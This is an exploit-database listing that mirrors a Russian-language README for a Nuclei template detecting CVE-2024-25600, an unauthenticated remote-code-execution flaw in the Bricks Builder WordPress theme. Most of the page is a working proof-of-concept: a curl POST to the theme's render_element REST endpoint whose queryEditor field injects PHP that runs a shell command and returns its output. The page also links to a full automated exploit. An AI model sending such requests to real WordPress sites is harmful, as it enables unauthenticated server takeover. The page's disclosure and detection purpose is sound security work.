Sploitus

Exploit for CVE-2024-25600_Nuclei-Template

kitploit · 2026-08-25

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CHRISTBOWEL-CVE-2024-25600_NUCLEI-TEMPLATE
# CVE-2024-25600_Nuclei-Template

Шаблон Nuclei и информация о PoC для CVE-2024-25600

## Описание 📝

Тема Bricks для WordPress уязвима к удаленному выполнению кода во всех версиях до 1.9.6 включительно. Это позволяет неаутентифицированным злоумышленникам выполнять код на сервере. Этот шаблон 🛠️ предназначен для обнаружения уязвимости CVE-2024-25600 🕳️, найденной в плагине Bricks Builder для WordPress, с помощью nuclei. Уязвимость позволяет неаутентифицированное удаленное выполнение кода на атакованных веб-сайтах 💻.

## Доказательство концепции (PoC) 📝

Полный PoC (автоматический) доступен по адресу https://github.com/chocapikk/CVE-2024-25600.

Базовый PoC, предоставленный в раскрытии, выглядит следующим образом:

root@kitploit:~
    
    
    curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
    -H "Content-Type: application/json" \
    -d '{
      "postId": "1",
      "nonce": "[NONCE]",
      "element": {
        "name": "container",
        "settings": {
          "hasLoop": "true",
          "query": {
            "useQueryEditor": true,
            "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
            "objectType": "post"
          }
        }
      }
    }'